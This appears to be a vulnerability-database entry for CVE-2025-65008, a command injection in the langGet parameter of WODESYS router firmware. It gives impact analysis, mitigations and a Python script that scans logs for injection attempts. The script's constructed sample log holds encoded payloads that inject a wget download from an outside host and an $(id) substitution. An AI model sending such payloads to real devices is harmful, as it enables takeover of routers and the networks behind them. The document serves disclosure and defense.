CVE-2025-65008: CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in WODESYS WD-R608U
In the WODESYS WD-R608U router (also known as WDR122B V2.0 and WDR28), due to a lack of validation of the langGet parameter in the adm.cgi endpoint, a malicious attacker can execute system shell commands. The vendor was notified early about this vulnerability but did not respond with details of the vulnerability or the vulnerable version range. Only version WDR28081123OV1.01 was tested and confirmed as vulnerable; other versions were not tested and might also be vulnerable.
AI Analysis
Technical Summary
CVE-2025-65008 is an OS command injection flaw (CWE-78) in the web management interface of the WODESYS WD-R608U router, also sold as WDR122B V2.0 and WDR28. The adm.cgi endpoint takes the langGet parameter and, as is typical for CWE-78 findings in embedded web interfaces, passes it into an operating-system command without neutralizing shell metacharacters, so a value of the form "en;<command>" ends the intended command and starts the attacker's. The advisory does not publish the vulnerable code and does not state whether the request must be authenticated; the entry records a CVSS 4.0 base score of 9.4, reflecting network reachability and high impact on confidentiality, integrity and availability. Only firmware WDR28081123OV1.01 was tested and confirmed vulnerable; other versions were not tested and should be treated as vulnerable until the vendor says otherwise. The vendor was notified (the CVE is assigned by CERT-PL) but did not respond with details or a fixed version, so no patch is available. No public exploit had been reported at the time of this analysis, but the attack is a single crafted HTTP request, so weaponization is trivial once the parameter handling is understood. Commands run with the privileges of the CGI process, which on consumer routers is commonly root, giving the attacker full control of the device: altered DNS or routing, interception of traffic, and a foothold for attacks on the network behind the router.
Potential Impact
For European organizations, exploitation of CVE-2025-65008 means code execution on a perimeter device rather than on a monitored endpoint. An attacker who controls the router can read and alter its configuration (including DNS settings and stored credentials such as PPPoE or Wi-Fi secrets), intercept or redirect traffic passing through it, install persistence that survives a reboot, and use the device as a pivot into the LAN behind it. The exposed population is mainly small-office and branch routers, plus industrial or facility networks that use these devices for connectivity, where a compromised router can cause outages as well as data exposure. Because no patch exists and the vulnerable version range is unknown, the risk has to be managed by restricting access rather than by updating. Managed service providers that deploy these routers for customers multiply the exposure, since one exploitation technique applies to every installation they manage.
Mitigation Recommendations
1. Take affected WD-R608U, WDR122B V2.0 and WDR28 devices off untrusted networks, and in particular make sure the web management interface is not reachable from the internet (WAN-side remote management disabled, no port forwarding to the HTTP service).
2. Restrict access to adm.cgi to a management VLAN, firewall rules or a VPN limited to administrators. The advisory does not state that authentication is required, so do not rely on the login page as a control.
3. Monitor HTTP traffic and any available web or proxy logs for requests to adm.cgi whose langGet value contains shell metacharacters (";", "|", "&", backticks, "$(" ), including their URL-encoded forms (%3B, %7C, %26, %60, %24%28), and alert on any match.
4. Inventory all WODESYS routers and record their firmware version. Only WDR28081123OV1.01 is confirmed vulnerable, but treat other versions as vulnerable until the vendor states otherwise.
5. Ask WODESYS support for fixed firmware and follow CERT-PL advisories for an updated vulnerable version range.
6. Where an IDS/IPS sits in front of the device, add a signature for the pattern in item 3; generic OS-command-injection rules will usually also fire on it.
7. If no fix is forthcoming, replace the device with one from a vendor that publishes security advisories and patches.
8. Prepare an incident response plan for router compromise: capture the running configuration and, if possible, a firmware image before power-cycling, rotate every credential stored on the device, then restore a known-good configuration on a patched or replacement device.
9. Brief network administrators on the vulnerability and on the indicators in item 3.
10. Back up router configurations regularly so a compromised device can be restored quickly.
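The detection described in item 3, together with the allow-list check that a fixed adm.cgi would need, as an added example that is not code from WODESYS, CERT-PL or this site: it scans Apache-style access-log lines for requests to adm.cgi whose decoded langGet value contains shell metacharacters, decoding twice so double-encoded payloads are caught, and shows the language-tag allow-list a hardened handler should apply instead of trying to filter metacharacters. The log lines, IP addresses and payloads are constructed for the example; the allow-list pattern is a hypothetical reference check, not the vendor's fix.

```python
"""Flag OS-command-injection attempts against the adm.cgi langGet parameter.

Added example for this advisory, not WODESYS or CERT-PL code.  The log
format is a constructed Apache-style access log; the metacharacter set is
the generic shell break-out set for CWE-78; LANG_TAG is a hypothetical
allow-list for what a language selector should ever accept.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Characters and sequences that let a value escape a shell command string.
# CR/LF are included: a CGI that builds `cmd "$value"` is split by an
# encoded %0a just as by ';'.
SHELL_META = re.compile(r"[;&|`$<>\n\r]|\$\(|\{|\}")

# Hypothetical hardened check: a language selector only ever needs a short
# tag such as "en", "zh-CN" or "pt_BR".  Anything else is rejected before
# it can reach a shell, so no metacharacter filtering is needed.
LANG_TAG = re.compile(r"^[A-Za-z]{2,3}([-_][A-Za-z0-9]{2,8})?$")

# Common Log Format: ip ident user [ts] "METHOD target PROTO" status size
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Constructed sample lines, not real traffic (RFC 5737 documentation ranges).
SAMPLE_LOG = [
    '192.0.2.10 - - [18/Dec/2025:15:26:39 +0000] '
    '"GET /cgi-bin/adm.cgi?page=lang&langGet=en HTTP/1.1" 200 512',
    '198.51.100.7 - - [18/Dec/2025:15:27:01 +0000] '
    '"GET /cgi-bin/adm.cgi?langGet=en%3Bwget%20http%3A%2F%2F198.51.100.7'
    '%2Fx%20-O%20%2Ftmp%2Fx HTTP/1.1" 200 88',
    '198.51.100.7 - - [18/Dec/2025:15:27:05 +0000] '
    '"GET /cgi-bin/adm.cgi?langGet=en%2524%2528id%2529 HTTP/1.1" 200 88',
    '203.0.113.5 - - [18/Dec/2025:15:28:00 +0000] '
    '"GET /cgi-bin/index.html HTTP/1.1" 200 2048',
]


def is_safe_lang(value: str) -> bool:
    """Allow-list validation a fixed adm.cgi should apply to langGet."""
    return LANG_TAG.fullmatch(value) is not None


def extract_lang_get(request_target: str) -> list[str]:
    """Return every decoded langGet value in a request target for adm.cgi.

    Repeated parameters are all returned.  parse_qs decodes once; the extra
    unquote catches double-encoded payloads (%2524%2528 -> %24%28 -> "$(").
    """
    parts = urlsplit(request_target)
    if not parts.path.endswith("adm.cgi"):
        return []
    values = parse_qs(parts.query, keep_blank_values=True).get("langGet", [])
    return [unquote(v) for v in values]


def scan_access_log(lines) -> list[tuple[str, str]]:
    """Return (client_ip, decoded langGet) for each suspicious request.

    Limitation: the parameter may also be sent in a POST body, which an
    access log does not record; body inspection needs a proxy or IDS.
    """
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        for value in extract_lang_get(m.group("target")):
            # Anything a hardened handler would reject AND that carries a
            # shell break-out sequence is treated as an injection attempt.
            if not is_safe_lang(value) and SHELL_META.search(value):
                hits.append((m.group("ip"), value))
    return hits


if __name__ == "__main__":
    for ip, payload in scan_access_log(SAMPLE_LOG):
        print(f"possible CVE-2025-65008 attempt from {ip}: langGet={payload!r}")
```

Run against a real log with scan_access_log(open(path)); the benign "langGet=en" request and the request to another path produce no alert, while the two injected values are reported once each. Note that the allow-list is the control a fixed firmware should apply; the metacharacter match is only a detection heuristic and will miss encodings the decoder does not unwrap.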
Affected Countries
Germany, France, United Kingdom, Italy, Spain, Netherlands, Poland, Belgium, Sweden, Czech Republic
Technical Details
- Data Version: 5.2
- Assigner Short Name: CERT-PL
- Date Reserved: 2025-11-13T09:42:15.301Z
- CVSS Version: 4.0
- State: PUBLISHED
Threat ID: 69441d2f4eb3efac369421ab
Added to database: 12/18/2025, 3:26:39 PM
Last enriched: 12/18/2025, 3:42:12 PM
Last updated: 12/19/2025, 11:42:00 AM
Related Threats
- CVE-2025-14847: CWE-130 Improper Handling of Length Parameter Inconsistency in MongoDB Inc. MongoDB Server (High)
- CVE-2025-14455: CWE-862 Missing Authorization in wpchill Image Photo Gallery Final Tiles Grid (Medium)
- CVE-2025-12361: CWE-862 Missing Authorization in saadiqbal myCred – Points Management System For Gamification, Ranks, Badges, and Loyalty Program (Medium)
- CVE-2025-66524: CWE-502 Deserialization of Untrusted Data in Apache Software Foundation Apache NiFi (High)
- CVE-2023-44247: Execute unauthorized code or commands in Fortinet FortiOS (Medium)